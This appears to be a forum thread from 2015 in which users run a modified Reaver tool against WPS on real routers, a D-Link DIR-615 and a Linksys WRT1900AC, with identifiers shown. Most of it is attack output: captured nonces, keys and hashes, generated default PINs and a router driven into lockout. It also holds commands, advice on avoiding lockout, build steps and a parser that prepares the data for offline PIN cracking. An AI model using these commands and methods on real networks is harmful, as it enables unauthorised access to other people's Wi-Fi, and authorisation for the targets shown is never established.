[P] E-Hash2: 0e:3a:b4:d2:93:21:91:5e:66:3b:f4:e6:13:db:40:87:b9 :fd:80:0b:2b:fa:87:37:fb:5d:41:67:21:38:aa:61
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 69130571.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.
root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -W1 -S

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 88:f6:3a:26:77:59:5d:b7:f9:07:f7:16:4b:6a:1c:af
[P] PKE: 9b:17:58:e6:f5:d8:bf:6e:b2:c7:4c:b3:b4:33:06:66:c2 :1c:fa:0b:ae:a2:77:c2:25:64:1f:3f:cc:61:98:07:1f:b f:90:7c:bc:2f:c3:c0:f9:6b:07:77:bb:5c:58:18:e5:80: 22:41:2c:28:77:d5:21:30:9f:37:70:94:aa:36:b4:dd:82 :50:0d:28:b0:12:c3:cd:42:a8:d1:76:9b:90:4d:e9:a7:4 e:52:4e:27:c4:92:39:af:31:4a:99:9e:33:ca:76:c6:a1: 05:67:8f:87:ca:fc:6f:92:d7:47:99:4f:86:0d:a7:3c:7c :b2:b7:cc:6a:fc:a1:d8:81:0e:a8:c3:79:99:a7:c7:cb:0 1:94:dc:5c:ac:15:3f:25:22:85:47:6b:81:30:bf:aa:f5: d2:ab:ac:5a:b0:72:13:0b:85:97:02:15:70:11:0e:ce:49 :16:43:a9:d3:23:89:6b:5e:cf:99:63:9a:bb:b4:e0:1f:3 b:83:6e:f7:ff:72:e4:36:d5
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[Pin Gen] Belkin Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 95278582

root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 95278582

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 95278582.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: ff:94:71:b4:2c:c9:c9:f7:58:84:92:e0:5c:f4:76:ee
[P] PKE: 57:c6:10:df:65:ef:bc:3b:d4:f0:04:9c:ad:01:05:58:ff :67:c5:31:67:16:f5:bf:6d:0e:13:2e:b2:87:f9:a3:12:1 d:bb:3b:79:be:6a:34:eb:e2:2d:3f:92:65:56:57:87:9a: b6:7b:0f:59:ba:d0:b3:28:1f:97:56:50:03:f0:1e:a8:68 :f9:6f:23:f7:81:98:10:de:9a:88:c6:39:36:78:62:ae:8 6:29:c0:d7:a3:b4:93:2c:34:b5:d1:a0:7f:a0:de:16:59: 67:d8:82:93:e9:79:77:23:3a:19:b8:7f:e6:c8:c6:15:33 :c7:2a:c2:82:c6:2a:64:e9:98:3e:26:47:1a:b5:96:68:e e:bd:80:4c:ba:8e:ff:2f:94:e9:b2:fd:6a:89:e1:a8:59: f1:c6:8c:00:cb:1e:ac:ca:87:e1:f8:88:9a:fb:36:26:31 :90:86:ee:2c:81:40:71:d0:e8:2d:f0:37:25:73:ff:e6:5 6:ee:7f:1c:d2:03:8a:3b:97
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: 73:ff:53:78:47:21:ee:d6:b8:90:4f:4f:bf:14:d6:7a:80 :f8:b0:60:d7:45:9e:ca:96:a4:ca:d1:e5:09:5e:d1:14:6 8:2d:78:45:e1:f8:28:39:54:13:2a:8f:c5:e0:8d:9e:02: cb:78:85:7d:e3:71:c4:34:91:ef:19:dc:e6:47:10:1e:b7 :ec:08:a7:2a:6a:f2:b1:52:ab:43:f0:ce:0e:cb:68:30:d 7:14:12:5d:6f:d0:0a:16:ad:65:ff:1f:6f:80:22:d8:70: 87:1f:2f:65:de:af:63:b1:92:1d:20:e2:a1:6a:db:4b:59 :4d:fc:ea:e0:e0:d7:53:4f:b2:57:7e:58:e5:d1:f5:38:4 c:a4:35:b0:77:dc:72:1f:c1:49:a6:62:aa:83:4c:52:69: 77:64:5a:52:7d:55:d4:79:6d:5b:fd:31:29:66:bc:0a:27 :00:f0:1d:78:13:af:c8:62:10:18:84:30:59:65:d4:56:f 2:14:9c:25:21:ed:7f:7d:93
[P] AuthKey: eb:19:49:07:2c:05:08:68:49:1f:e1:03:71:fa:31:02:0e :e8:d2:6c:38:93:77:87:58:b1:5c:79:16:3f:f0:a3
[+] Sending M2 message
[P] E-Hash1: d8:46:6a:42:ad:f5:1a:c0:4e:07:f3:19:89:01:7f:13:4d :a2:c5:49:f5:ba:83:2f:22:c1:31:71:5e:5e:31:9e
[P] E-Hash2: 62:b2:a7:fb:86:45:ed:89:f8:13:55:59:e4:91:70:0f:3a :26:5a:81:fd:71:60:13:fd:c2:c5:61:e4:85:1c:ba
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 95278582.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c0:d3:bf:2d:93:56:f7:70:dc:a8:59:f5:36:d0:72:93
[P] PKE: c5:86:72:3c:5a:5e:03:03:c1:13:4c:64:3e:3e:89:57:7b :76:f7:2b:1c:ff:2a:91:89:33:d6:d9:b3:bb:f4:d1:06:5 2:d9:01:87:cf:52:f5:6c:14:65:52:fd:8d:00:68:47:b9: d4:ca:14:db:8a:8a:3b:e6:d0:f1:eb:43:29:0f:28:5e:90 :48:95:fa:53:ef:bb:9c:9e:f0:61:1d:71:83:85:cb:a8:3 2:ea:8b:50:a2:21:00:a2:5d:73:b7:bd:6c:d5:94:89:12: 3d:e6:ca:5e:ff:8c:d5:4c:f4:d7:8b:9a:55:8e:5d:79:47 :a4:38:11:66:68:29:4b:16:84:9c:a0:47:19:c5:50:a8:3 6:97:73:d2:63:a9:f3:16:bb:2a:4a:6e:8f:d7:09:e1:ac: 5c:1f:68:19:17:b8:70:77:94:e0:d1:53:f7:8f:7d:f1:ad :14:c0:7e:da:9f:26:fe:19:ab:6c:52:dc:8e:88:fd:94:0 b:cb:33:ce:d1:61:42:8c:bb
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: b9:8a:d9:34:3e:d8:cd:45:b1:1d:f6:17:d1:16:fd:68:76 :3d:59:44:de:eb:14:ca:dd:db:34:7f:1f:70:6a:45:0b:c 1:0f:d7:c6:5e:5f:e0:be:30:ce:cc:66:9e:99:20:6c:86: 2e:5a:de:5f:40:47:ef:68:fc:cd:3a:59:40:fa:09:5a:6d :c7:af:31:2a:96:b9:7a:08:d2:fc:75:dc:4b:0b:da:ca:6 1:de:c6:4e:d4:c7:49:58:89:83:97:d9:ef:21:c9:70:07: 26:96:3a:6b:6b:71:34:fe:62:c0:61:ef:7e:66:bc:1c:44 :10:0f:54:59:ba:5a:77:46:75:ce:87:7e:71:12:94:b5:5 1:2f:6b:b7:19:7b:cf:e5:45:78:5f:8b:1f:e1:1e:3f:09: 1a:cc:99:4e:11:a7:fc:96:23:2d:8a:57:31:25:27:b6:67 :43:56:63:c2:d6:7d:96:50:9d:e8:72:2a:36:7a:a5:8d:0 3:c4:0e:92:5a:56:6e:34:22
[P] AuthKey: 34:92:98:34:a9:c5:f8:45:40:64:7e:e1:c5:de:27:af:88 :35:80:6b:1e:49:d4:6e:d3:94:d3:99:0e:69:07:2c
[+] Sending M2 message
^C

slim76
2015-04-18, 12:32
@ t6_x

Nice work matey, many thanks.

I've got a question: what does "-P, --pixiedust-loop" do, and when should it be used?

Saydamination
2015-04-18, 12:37
I took a screenshot in Wireshark of the M1-M2-M3-M4 messages and a screenshot of the attempt.

Why does Pixiewps not work for TP-Link RTL 8671 EV 2006 27 07 (Realtek)?

Where is the pin? :)

soxrok2212
2015-04-18, 13:03
@ t6_x

Nice work matey, many thanks.

I've got a question: what does "-P, --pixiedust-loop" do, and when should it be used?

It stops the WPS exchange after the M3 message is received. This way (hopefully) we will avoid any lockouts... the router will report a failed WPS exchange and won't count it :D You should only use it when attacking via Pixie Dust. If you are doing a regular old 11,000 pin brute force, don't use it.

Extradry
2015-04-19, 00:53
@t6_x

Just confirming: does the latest version on git (1.5.2) only require the -K 1 option to test all 3 chipsets now?

Cheers
Exta

t6_x
2015-04-19, 01:08
http://i.imgur.com/aZv2TNu.png
http://i.imgur.com/0zBtqpb.png
http://i.imgur.com/f8AUILE.png
http://i.imgur.com/n7Fs4s3.png
http://i.imgur.com/sC80azr.png
http://i.imgur.com/otwUL64.png
http://i.imgur.com/RpB5I6T.png
http://i.imgur.com/awpjzcU.png

I took a screenshot in Wireshark of the M1-M2-M3-M4 messages and a screenshot of the attempt.

Why does Pixiewps not work for TP-Link RTL 8671 EV 2006 27 07 (Realtek)?

Where is the pin? :)


Because the flaw that pixiedust takes advantage of is a firmware flaw and not a chipset flaw.

But as it is difficult to make a list of all firmwares which exist, a chipset list is made of those where there is a higher probability that the attack will work.

nuroo
2015-04-19, 14:47
Just the Belkin pin Attack

Target:

airodump-ng
CH 6 ][ Elapsed: 4 mins ][ 2015-04-19 09:48

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS ESSID MANUFACTURER

..............:52:A1 -66 24 1160 336 0 6 54e. WPA2 CCMP PSK 1.0 LAB,DISP 999 Kane Belkin International Inc.
..............:37:56 -83 0 5 0 0 6 54e WPA2 CCMP PSK 1.0 LAB,DISP 999 Kane Belkin International Inc.

BSSID STATION PWR Rate Lost Frames Probe

..............:52:A1 ..............:37:56 -86 54e- 1e 0 98 999 Kane

Reaver Attack

root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N -S -K1 -W1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from ..............:52:A1
[+] Associated with ..............:52:A1 (ESSID: 133 Kane)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 9c:60:b1:26:35:6b:54:36:94:b4:db:e3:8a:f8:98:99
[P] PKE: ee:4a:2f:c4:45:67:2e:c2:e8:89:0c:c0:ad:08:31:0c:98 :db:ce:d5:8c:53:23:8c:a3:e7:af:c1:f8:81:1f:69:88:8 c:28:b9:bc:02:3f:32:4a:f6:f0:59:21:59:35:d8:0c:8f: 44:ce:0d:34:f5:21:3f:8e:8e:d4:a1:03:62:4c:d2:e9:ea :fe:4d:15:72:a7:84:63:d6:0d:fb:c5:19:79:b8:57:96:b 6:7f:e1:f8:a8:fe:28:88:76:04:ae:46:54:92:0a:0c:38: c4:b9:c3:dc:36:45:3a:65:18:93:ee:f4:f0:cc:6c:10:8b :8e:bc:c2:c9:1f:10:9c:61:ff:ce:d4:31:32:8c:30:31:f 0:48:5d:2b:94:ec:c0:91:4e:2d:59:3f:e1:8c:13:c2:59: 63:73:dc:a3:0e:67:fc:a2:b3:06:e7:b5:c0:17:36:73:77 :14:d2:8f:d6:a2:d4:be:bb:4b:8f:3d:e6:2b:c0:81:50:0 f:da:d5:09:b4:12:18:d2:e8
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[Pin Gen] Belkin Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 92454590
[Pin Gen] Pin Generated (+1): 02932804
[Pin Gen] Pin Generated (-1): 81966103

Next step? Try all three pins?
reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590
Because reaver started looping, is this correct? I had to Ctrl+C.


root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from ..............:52:A1
[+] Associated with ..............52:A1 (ESSID: 133 Kane)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[P] E-Nonce: 2c:7b:dd:2f:82:20:e5:a0:f6:92:35:7a:f6:c9:2a:e7
[P] PKE: 4a:6d:39:a0:aa:62:4c:05:69:35:0d:c8:7b:4a:5d:bf:8d :93:c6:49:93:c2:df:b5:ec:d6:73:cc:d6:4b:48:06:f2:2 c:52:37:c2:a7:95:1a:28:e6:65:b0:5d:f0:f5:7e:12:e0: 98:48:db:9a:4a:76:5d:45:3b:33:8e:d9:e6:d4:f4:76:42 :7b:03:73:29:d3:f1:3b:56:0d:e7:95:76:9d:f8:94:bb:5 a:67:59:45:73:70:d5:48:5b:5a:a2:89:d1:8f:69:43:00: 1c:bc:ce:ae:48:7b:08:9e:64:c2:d7:21:b3:ed:73:99:43 :dd:44:8a:a5:9a:24:fd:8c:02:7c:17:5c:f2:4a:5f:5b:9 c:c3:8d:99:c1:49:5b:2e:5f:09:63:85:ff:8a:72:77:c6: 0a:56:14:f7:29:28:9f:82:24:47:aa:1b:eb:28:16:0d:f0 :e2:a9:d0:f9:01:e4:61:a0:b8:24:44:71:34:d0:e5:f5:3 f:71:b8:88:12:04:01:36:15
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[P] PKR: e3:07:eb:ea:e5:8d:25:e4:a8:65:08:ab:52:99:3b:2c:8a :a4:c5:82:c9:46:96:62:1c:76:63:96:06:ba:e9:14:1d:d 1:c0:1f:42:27:38:99:6d:14:c6:79:00:bf:9d:f5:77:98: 73:9d:fd:83:52:f3:f1:cb:73:0e:e1:6d:d2:17:be:9b:ba :fc:16:f9:2d:22:e3:ab:c0:3a:90:b9:0c:3d:b0:0b:ad:9 0:89:b5:12:c9:41:3f:36:17:39:16:3b:a5:80:e4:a1:17: 39:9b:1f:24:3f:f1:20:21:6a:f0:48:a9:05:73:3c:b6:06 :c8:fe:34:a9:79:70:eb:ff:a8:7c:49:07:19:5f:c8:2e:7 6:a3:c7:8a:5d:10:28:72:f1:41:b2:38:d7:53:87:99:d4: bd:e0:9c:d7:01:01:cc:f9:b0:14:9e:6e:52:44:fe:34:66 :b0:64:a1:69:73:4f:09:0e:93:89:0b:c9:cb:b6:51:d5:5 f:ba:9e:7d:44:be:91:f0:d5
[P] AuthKey: 19:f0:66:81:34:9e:6f:eb:41:7f:93:38:f7:42:ba:ce:6d :88:06:0c:76:43:d4:cc:9b:0f:c8:44:9d:43:21:e5
[P] E-Hash1: 16:a4:f5:79:a7:5b:29:1d:1a:8f:d7:4e:dd:fd:5a:a6:8e :94:3c:34:f0:77:ae:e0:03:38:31:8f:85:25:fb:9c
[P] E-Hash2: 10:90:3b:33:ed:74:7c:5e:9d:51:b7:2d:8f:4b:55:5f:d6 :64:a2:91:7a:f7:66:7b:86:61:29:d1:a4:c0:bb:c4
[P] E-Nonce: 72:08:37:e8:34:12:e7:50:25:d4:c1:80:f9:68:a0:0b
[P] PKE: 19:a9:2d:d4:31:cb:f4:be:b8:38:bd:18:91:0a:de:f5:1b :1c:cf:6e:d3:c2:34:00:1e:88:db:6f:bd:a1:bb:d9:51:b c:d8:d2:60:24:c6:01:97:27:ee:ad:01:96:49:47:c4:e9: 44:e6:c7:84:3b:25:d5:b7:ab:bf:18:f3:39:0e:ee:74:6d :b6:f0:a4:dc:55:c1:cf:ad:4c:2d:a2:af:fb:21:a1:77:5 d:59:13:bc:0a:fd:6a:cc:91:97:96:78:7e:c0:88:65:7f: 0d:b1:b9:dd:85:7a:45:2c:2f:78:d9:af:2a:0e:37:12:66 :8f:c3:e8:fc:0c:b5:eb:32:5a:cd:36:88:91:ba:ad:3c:5 f:72:e9:b1:53:91:51:1c:24:39:f1:6a:73:e7:bb:b7:40: f0:35:61:7d:84:37:b3:21:32:3d:55:9d:a4:e7:94:9b:2a :53:45:40:d7:5b:8c:5b:20:95:ad:1e:df:01:f7:33:7a:9 8:ca:7b:5b:91:a7:d7:c9:da
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[P] PKR: 72:be:10:2b:73:ae:55:e7:d0:4e:8a:b7:f4:d5:4c:90:f5 :fe:83:9c:91:80:76:d7:93:bb:95:7c:07:67:3e:00:9c:5 4:f5:31:e5:be:13:cd:ad:77:93:13:5d:f8:fc:68:2d:27: 36:3e:2a:99:8e:08:fe:d5:e1:85:f1:f5:2d:e7:a0:13:48 :05:56:62:04:42:19:ef:ca:b9:6b:5c:15:02:37:df:51:c 5:12:a2:63:0e:ce:fa:c1:46:43:ef:3e:45:70:2c:8c:da: 21:ef:c3:6f:ea:81:de:85:b7:b0:df:f7:6a:84:48:f5:63 :d6:29:bf:a8:cf:1e:da:1a:ba:7f:d7:ed:58:c9:7b:65:f e:21:3c:e8:24:89:9b:50:bb:b5:b4:92:ea:ec:3b:2c:8e: 40:77:77:71:cb:37:b5:a6:76:8f:27:53:61:5b:ef:27:83 :ea:b9:af:93:89:93:4b:d4:a6:1f:56:c7:e1:5d:32:7c:6 8:0e:54:e8:a1:58:ab:1a:41
[P] AuthKey: c9:9d:b6:14:1f:5e:4d:c0:33:fb:84:01:5d:6f:f4:82:a3 :e7:e1:c9:2f:da:52:e0:65:7d:e5:11:45:a3:74:91
[P] E-Hash1: 0a:2f:d2:43:7f:21:b5:77:ab:84:a3:29:33:b0:6a:29:0e :56:e6:35:61:69:65:0b:70:37:34:6d:05:0e:82:ab
[P] E-Hash2: 6c:07:cf:fc:5a:9d:50:ed:4d:d3:76:73:cb:5f:58:ee:e3 :75:5f:e8:42:6d:f9:09:ee:14:5a:21:e2:98:b4:74
[P] E-Nonce: 3c:15:76:fe:ec:f9:26:91:a0:33:2e:cb:24:03:4b:a5
[P] PKE: f3:68:9b:3c:3e:9f:dc:1d:ac:0d:7c:1d:e0:fa:c1:b0:e9 :f5:5b:bf:42:18:e7:ee:15:c9:e8:88:fd:5e:01:27:7e:8 7:17:60:07:4f:1e:82:d7:02:bb:f7:a8:b1:df:9d:5d:58: 72:25:57:81:c8:32:5c:1d:97:46:77:81:af:0c:69:d8:46 :6e:3b:51:10:e2:22:07:45:c9:36:84:28:22:ec:69:c1:9 5:a4:79:9d:62:e6:40:9f:b3:61:60:59:0d:c7:55:3c:9c: 5c:30:7f:ec:6c:0e:2d:ba:16:b8:03:7b:52:f1:f1:95:9b :b6:d2:d2:88:a4:39:8f:99:89:5b:46:b2:b5:06:6c:2b:4 6:09:08:b5:72:94:ae:9a:d8:c1:a3:b5:e0:c1:b2:d0:ee: 47:eb:f1:44:5b:be:09:e0:48:79:68:e8:21:1c:5a:2a:8e :df:af:e9:cb:6f:77:1a:b3:ec:d5:d0:a4:3a:77:d5:4d:3 7:1c:98:97:d1:42:ae:62:db
[P] WPS Manufacturer: Linksys, LLC
[P] WPS Model Number: WRT1900AC
[P] WPS Model Serial Number: 13J10607432814
[P] PKR: 42:ba:10:a6:1e:5a:ce:c9:89:4b:df:91:66:02:98:84:5b :c0:5a:07:93:a1:fe:71:16:49:87:61:63:b8:fd:7e:ff:7 9:e6:ae:8e:a6:cd:7b:1d:3e:31:40:d1:c7:fc:50:90:48: 40:2d:b1:63:ee:c2:fc:d5:55:31:87:ed:98:a8:e0:ff:ac :cc:aa:ec:e2:b7:51:76:10:e0:47:11:9c:68:01:7e:65:7 4:9b:47:45:27:4e:44:b0:bd:32:09:b9:08:69:08:1a:ea: a0:93:78:da:ba:81:31:ee:6a:42:34:ec:7e:21:fb:f1:4b :f9:c3:03:43:1a:78:6a:3c:5f:0a:c6:42:28:c7:32:df:6 3:0e:ec:5a:38:22:49:98:54:9a:85:be:e4:67:f0:6a:9d: ed:a4:c2:3c:dc:d5:ed:14:29:da:25:4b:05:f7:fc:dc:76 :71:a5:48:ba:42:1a:ab:eb:e2:0f:d4:7a:ef:82:20:16:4 c:78:eb:9f:d5:16:4f:00:a2
[P] AuthKey: d8:65:80:ae:99:23:c9:af:b9:32:63:32:80:3e:57:c4:56 :42:59:bc:ee:e4:7d:21:53:dc:97:24:b8:02:ba:95
[P] E-Hash1: ae:7a:f6:a6:1b:ac:f5:60:89:1e:d9:5c:91:38:31:e4:c9 :3c:0f:74:d6:a2:c3:fb:6f:93:c1:09:6b:a7:88:a9
[P] E-Hash2: 19:54:44:af:8f:a0:da:11:4a:6e:05:34:aa:63:b6:0e:8c :8e:03:12:fa:ab:54:d0:3d:3e:d8:21:14:d6:ac:19

AP locked WPS

CH 6 ][ Elapsed: 15 mins ][ 2015-04-19 10:31 ][ WPA handshake: ..............:52:A1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS ESSID MANUFACTURER

..............:52:A1 -66 23 5527 1778 0 6 54e. WPA2 CCMP PSK Locked 999 Kane Belkin International Inc.
..............:37:56 -77 77 1776 0 0 6 54e WPA2 CCMP PSK 1.0 LAB,DISP 999 Kane Belkin International Inc.

BSSID STATION PWR Rate Lost Frames Probe

Should I try other pins after I try unlocking the router?
What's the correct reaver command after the pin is found?

soxrok2212
2015-04-19, 14:59
Linksys was recently acquired by Belkin... that is why it shows the Manufacturer as Belkin. However, based on your reaver output, you are attacking a Linksys WRT1900AC... which technically is NOT a Belkin router.

As far as I know, the WRT1900AC uses a Marvell chipset which is not very common, but certainly worth looking into as I assume they are very popular with all the WRT series fans. If you could get more data, I would love to take a look into it... hopefully with help from others :D

nuroo
2015-04-19, 15:16
Thanks for the info... I just went by airodump's manufacturer column, silly noob, I should have seen that.
(used airodump because wash gives "rssi 00" on the Atheros chipset)

What info do you need?
Wireshark capture?
Send where?

soxrok2212
2015-04-19, 15:18
Complete reaver WPS exchange and a cap of the exchange. You can e-mail it to my [email protected] (anti-spam haha)

nuroo
2015-04-19, 15:26
Reaver with or without small keys?
Actually, post the reaver syntax you want.

soxrok2212
2015-04-19, 15:30
Reaver with or without small keys?
Actually, post the reaver syntax you want.

Without small keys.



Manufacturer:
Model:
Model Number:
Serial Number:
E-Nonce:
PKR:
PKR:
E-Hash1:
E-Hash2:
Authkey:


Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.
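To make the field list above easier to assemble from a pasted reaver run, here is an added parser (example code written for this thread, not part of reaver or pixiewps) that splits reaver's [P] lines into per-exchange records, strips the spaces that forum line wrapping inserts into the long hex values, checks the byte lengths reaver should print, and flags runs made with -S (small DH keys), whose PKR is the value 2. The sample log it parses is constructed with synthetic values, not taken from any real AP.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Byte lengths reaver's [P] values should have: 128-bit WPS nonces, 1536-bit DH
# public keys (PKE/PKR) and 256-bit HMAC-SHA-256 outputs (AuthKey, E-Hash1/2).
EXPECTED_LEN = {"E-Nonce": 16, "PKE": 192, "PKR": 192,
                "AuthKey": 32, "E-Hash1": 32, "E-Hash2": 32}
TEXT_FIELDS = {"WPS Manufacturer": "manufacturer", "WPS Model Number": "model",
               "WPS Model Serial Number": "serial"}
# "[P] <field>: <value>"; the non-greedy key group stops at the first colon.
P_LINE = re.compile(r"^\[P\]\s+([A-Za-z0-9 -]+?):\s*(.*)$")


@dataclass
class Exchange:
    """Values reaver printed for one M1..M3 exchange with the AP."""
    manufacturer: Optional[str] = None
    model: Optional[str] = None
    serial: Optional[str] = None
    values: Dict[str, bytes] = field(default_factory=dict)
    problems: List[str] = field(default_factory=list)

    def uses_small_dh_key(self) -> bool:
        # reaver -S uses DH private key 1, so its public key PKR is g^1 = 2
        # (191 zero bytes then 02 in the log); the thread asks for runs
        # made without small keys, so flag this before sending data.
        pkr = self.values.get("PKR")
        return pkr is not None and int.from_bytes(pkr, "big") == 2

    def is_complete(self) -> bool:
        return not self.problems and all(k in self.values for k in EXPECTED_LEN)


def parse_hex(text: str) -> bytes:
    # Forum line wrapping inserted spaces into the long colon-separated runs
    # (e.g. "4b:9b :72"), so drop all whitespace and colons before decoding.
    return bytes.fromhex(re.sub(r"[\s:]", "", text))


def parse_reaver_output(log: str) -> List[Exchange]:
    """Split a reaver -vv log into exchanges; each starts at its E-Nonce line."""
    exchanges: List[Exchange] = []
    current: Optional[Exchange] = None
    for raw in log.splitlines():
        m = P_LINE.match(raw.strip())
        if not m:
            continue  # [+] / [?] progress lines carry no protocol values
        key, value = m.group(1), m.group(2).strip()
        if key == "E-Nonce" or current is None:
            current = Exchange()
            exchanges.append(current)
        if key in TEXT_FIELDS:
            setattr(current, TEXT_FIELDS[key], value)
        elif key in EXPECTED_LEN:
            try:
                data = parse_hex(value)
            except ValueError:
                current.problems.append(f"{key}: not valid hex")
                continue
            if len(data) != EXPECTED_LEN[key]:
                current.problems.append(
                    f"{key}: {len(data)} bytes, expected {EXPECTED_LEN[key]}")
            current.values[key] = data
    return exchanges


def summarize(exchanges: List[Exchange]) -> List[str]:
    """One triage line per exchange: identity, DH key type, completeness."""
    out = []
    for i, ex in enumerate(exchanges, 1):
        dh = "small DH key (-S)" if ex.uses_small_dh_key() else "full DH key"
        status = "complete" if ex.is_complete() else (
            "incomplete: " + "; ".join(ex.problems or ["fields missing"]))
        out.append(f"exchange {i}: {ex.manufacturer} {ex.model} [{dh}] {status}")
    return out


def _hex(data: bytes) -> str:
    return ":".join(f"{b:02x}" for b in data)


# Constructed sample in reaver's output format (synthetic values, not from any
# real AP): one exchange made with -S, then an E-Nonce cut off mid-value as
# happens at the end of a pasted log.
_PKE = _hex(bytes(range(192)))
SAMPLE_LOG = "\n".join([
    "[+] Trying pin 12345670.",
    "[P] E-Nonce: " + _hex(bytes(range(16))),
    "[P] PKE: " + _PKE[:100] + " " + _PKE[100:],  # wrap artifact on purpose
    "[P] WPS Manufacturer: D-Link",
    "[P] WPS Model Number: DIR-615",
    "[P] WPS Model Serial Number: none",
    "[+] Received M1 message",
    "[P] PKR: " + _hex(b"\x00" * 191 + b"\x02"),
    "[P] AuthKey: " + _hex(bytes(range(32))),
    "[P] E-Hash1: " + _hex(bytes(range(32, 64))),
    "[P] E-Hash2: " + _hex(bytes(range(64, 96))),
    "[P] E-Nonce: f4:c4:53:ae:77:33:76:ca:4e:38:",
])

if __name__ == "__main__":
    print("\n".join(summarize(parse_reaver_output(SAMPLE_LOG))))
```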

nuroo
2015-04-19, 19:26
Suggestion only

Get Reaver
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip

unzip master.zip (verify, I'm not at my PC)

Build Reaver

cd reaver-wps-fork-t6x-master
cd src
./configure
make

Install Reaver

sudo make install

t6_x
2015-04-20, 06:17
@t6_x

Just confirming: does the latest version on git (1.5.2) only require the -K 1 option to test all 3 chipsets now?

Cheers
Exta


Sorry for the delay in responding, I have not had much time this weekend.

After tests and reviews, the best way to handle the situation is to run all possible attacks at once, even though this takes more time: on the machine I'm using, it takes about 1 min to finish one single pixiewps run.

But even so, it is more practical to run it only once than to divide the attack among several other options.

I already was not very happy with the options, and soxrok2212 finally convinced me that it was better to have only one.

So the answer is yes: the single option -K 1 runs pixiewps with all the arguments, and in turn, when pixiewps receives all the arguments, it runs all the bruteforces known up to the moment.

t6_x
2015-04-20, 06:27
Just the Belkin pin Attack

Should I try other pins after I try unlocking the router?
what's the correct reaver command after the pin is found?


It generates 3 pins.

This is because of the following.

We do not know which MAC the router is using to generate the pin.

So first it generates the pin for the BSSID used.

Then it generates the pin for the BSSID + 1, which is the MAC with 1 added to the last value, because many routers' MACs are sequential.

ex:

mac lan 00:00:00:00:00:05
wlan1 00:00:00:00:00:06

But on some models the wlan1 MAC is the main MAC and the LAN MAC is the next one, so since we cannot be sure, pins are generated for MAC, MAC +1 and MAC -1.

Of course there may be models that do not follow this rule, but all those looked at so far followed it; some used the following MAC and others the previous MAC.

Now, regarding the loop, the -vv option was missing to really know what was going on, but I believe the pin generator did not generate the correct pin and it was in the same loop trying the pin until the router went into lockout.

So far I have found only one router for which the pin generator managed to generate the pin correctly.

SeaF0ur
2015-04-20, 07:45
In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? A full handshake, right? And then a separate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?

datahead
2015-04-20, 07:48
For those wondering what reaver's -P option is intended for:

Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message, to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
This option was made with the intent of:

----Collecting repetitive hashes for further comparison and/or analysis / discovery of new vulnerable chipsets, routers etc.

----Time sensitive attacks where the hash collecting continues repetitively until your time frame is met.

